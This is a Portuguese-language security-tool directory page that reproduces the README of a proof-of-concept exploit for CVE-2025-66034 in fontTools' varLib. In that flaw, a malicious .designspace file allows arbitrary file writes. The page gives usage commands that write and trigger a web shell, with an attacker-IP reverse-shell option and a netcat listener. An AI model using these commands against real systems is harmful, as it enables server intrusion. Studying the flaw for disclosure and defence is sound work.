Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
varlib-cve-2025-66034 — Prova de conceito de exploit para CVE-2025-66034 no pipeline de geração de fontes variáveis do fontTools. Um arquivo .designspace criado de forma maliciosa permite o controle do caminho de saída, possibilitando escrita arbitrária de arquivos. O script automatiza a criação do payload, a geração da fonte e o upload para demonstrar o problema. | Kitploit
Ferramentas/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
212há 1 mêsAinda não revisado

Sobre

Prova de conceito de exploit para CVE-2025-66034 no pipeline de geração de fontes variáveis do fontTools. Um arquivo .designspace criado de forma maliciosa permite o controle do caminho de saída, possibilitando escrita arbitrária de arquivos. O script automatiza a criação do payload, a geração da fonte e o upload para demonstrar o problema.

Compartilhar

Exploit fontTools varLib CVE-2025-66034

cve component vulnerability vector impact language dependency license

Este repositório não introduz uma nova vulnerabilidade.

Este é um exploit de Prova-de-Conceito para CVE-2025-66034 que afeta o pipeline de geração de fontes variáveis varLib do fontTools.

A vulnerabilidade permite que atacantes controlem o nome do arquivo de saída dentro de um arquivo .designspace malicioso. Quando processado por um serviço vulnerável de geração de fontes, isso pode levar à escrita arbitrária de arquivos no sistema de arquivos do servidor.

O script varlib_cve_2025_66034.py automatiza a criação do payload, geração de fontes, upload e acionamento opcional do shell.


Recursos

  • Criação automática de fontes mestre compatíveis usando fontTools
  • Geração de nome de arquivo de shell aleatório
  • Caminho de destino e endpoint de upload personalizáveis
  • Listener nc automático
  • Nenhuma preparação manual de fontes necessária

Requisitos

Python 3.9+

Instale as dependências:

pip install fonttools requests

Netcat é necessário para o listener, portanto o próximo comando é necessário se você usar a opção --no-listen:

nc -lvnp <PORT_NUMBER>

Uso

Se o seu alvo for um laboratório auto-hospedado rodando em mysite.com, e o caminho de upload, o caminho de escrita no sistema de arquivos e o caminho de acionamento acessível via web corresponderem aos padrões do script, você pode executá-lo diretamente.

Uso básico:

python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

É muito provável que o alvo use URLs ou caminhos de sistema de arquivos diferentes; substitua os padrões pelas opções disponíveis abaixo, como --url, --path e --trigger, ou modifique o script manualmente

Nota: os nomes dos campos do formulário multipart podem variar dependendo do ambiente. Se o alvo não usar os mesmos nomes de campos de formulário que o script, ajuste-os na seção files antes de executar o exploit.

Opções

ArgumentoDescrição
--ipIP do listener do atacante
--portPorta do listener
--pathCaminho no sistema de arquivos do alvo onde o arquivo será escrito (deve ser acessível via web para acionar um web shell)
--urlEndpoint de upload, o formulário pode variar
--triggerURL base usada para acionar o payload escrito após o upload
--no-listenDesativa o listener netcat automático

Exemplo com opções personalizadas:

python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

Fluxo do Exploit

  1. Gerar fontes mestre compatíveis
  2. Criar arquivo .designspace malicioso
  3. Enviar payload via POST multipart
  4. Escrever arquivo arbitrário no servidor
  5. Acionar o payload via requisição HTTP

Créditos / Agradecimentos

Agradecimentos especiais e respeito a:

  • Os mantenedores e contribuidores do projeto fontTools pelo seu trabalho na biblioteca open-source fontTools.
  • Os pesquisadores de segurança que descobriram e divulgaram responsavelmente a CVE-2025-66034.
  • A comunidade de segurança open-source por documentar e analisar vulnerabilidades que ajudam a melhorar a segurança de software.

Esta prova-de-conceito é fornecida para fins educacionais e de pesquisa para ajudar a entender a vulnerabilidade e seu impacto.


Aviso Legal

Este código é fornecido apenas para fins educacionais e de pesquisa.

Não use este exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.

O autor não é responsável pelo uso indevido ou danos causados por este software.


Referências

  • Detalhes da CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • Aviso do GitHub: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • Projeto fontTools: https://github.com/fonttools/fonttools
  • Documentação do fontTools: https://fonttools.readthedocs.io/
Baixar ferramenta